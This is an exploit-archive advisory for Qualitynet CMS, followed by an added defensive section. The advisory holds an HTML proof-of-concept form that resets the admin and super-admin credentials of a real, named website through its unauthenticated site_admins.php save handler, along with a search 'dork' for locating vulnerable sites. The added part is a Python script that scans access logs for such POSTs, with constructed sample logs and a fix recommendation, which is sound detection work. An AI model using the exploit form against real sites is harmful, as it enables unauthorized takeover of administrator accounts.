Qualitynet CMS Remote Change Admin Password

2011.03.18
Credit: ahmadbady
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>coded by ahmadbady</title>
<script language="JavaScript">
//===========================================================================
//( #Topic : qualitynet cms
//( #Bug type : remote change admin password exploit
//( #Advisory : http://www.qualitynet.co.il
//===========================================================================
//( #Author : ItSecTeam
//( #Email : Bug@ITSecTeam.com
//( #Website: http://www.itsecteam.com
//( #Forum : http://forum.ITSecTeam.com
//( #dork : http://www.qualitynet.co.il/content_page_18.html
//---------------------------------------------------------------------
</script>
</head>
<body>
<!-- Posts new admin and super-admin credentials to the CMS save handler -->
<form name="adminsForm" method="post" onsubmit="" action="http://www.eyeclick.com/site_admins.php?act=save" enctype="multipart/form-data">
<table align="center" width="316">
<tr>
<td>Admin Username : &nbsp;</td>
<td><input type="text" class="txtField" name="user" value="admin" /></td>
</tr>
<tr>
<td>Admin Password : &nbsp;</td>
<td><input type="text" class="txtField" name="pass" value="12345678" /></td>
</tr>
<tr>
<td>Super Admin Username : &nbsp;</td>
<td><input type="text" class="txtField" name="adminuser" value="itsecteam" /></td>
</tr>
<tr>
<td>Super Admin Password : &nbsp;</td>
<td><input type="text" class="txtField" name="adminpass" value="12345678" /></td>
</tr>
<tr>
<td colspan="2" align="left"><input type="submit" value="Save Details" class="btnSubmit" /></td>
</tr>
</table>
</form>
</body>
</html>
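
A log check for the request this PoC form sends, added here as an example and not part of the original advisory: it scans web-server access logs for POSTs to site_admins.php?act=save that arrive with no Referer or with a Referer from another host. The Combined Log Format, the host name cms.example.test and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

SITE_HOST = "cms.example.test"  # assumption: host name of the monitored site

# Combined Log Format (assumed): ip - user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

def is_admin_save(method, target):
    """True for the request the PoC form sends: POST site_admins.php?act=save."""
    parts = urlsplit(target)
    return (method == "POST"
            and parts.path.lower().endswith("/site_admins.php")
            and "save" in parse_qs(parts.query).get("act", []))

def suspicious_saves(lines, site_host=SITE_HOST):
    """Return (time, ip, status, reason) for admin-save POSTs not sent from the site's own pages."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_admin_save(m["method"], m["target"]):
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            reason = "no referer"
        elif urlsplit(referer).hostname != site_host:
            reason = "off-site referer"
        else:
            continue  # same-site form post: expected admin activity, still worth auditing
        hits.append((m["time"], m["ip"], m["status"], reason))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Mar/2011:09:58:01 +0000] "GET /content_page_18.html HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '192.0.2.10 - admin [18/Mar/2011:10:00:40 +0000] "POST /site_admins.php?act=save HTTP/1.1" 302 0 "http://cms.example.test/site_admins.php" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Mar/2011:10:02:11 +0000] "POST /site_admins.php?act=save HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [18/Mar/2011:10:05:37 +0000] "POST /site_admins.php?act=save HTTP/1.1" 200 512 "http://other.example.net/form.html" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Mar/2011:10:06:02 +0000] "POST /site_admins.php?act=edit HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_saves(SAMPLE_LOG):
        print(*hit, sep="  ")
```

A same-site Referer is not proof of authorization, so treat the output as triage only. The handler itself has to require an authenticated admin session and an anti-CSRF token before acting on act=save.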

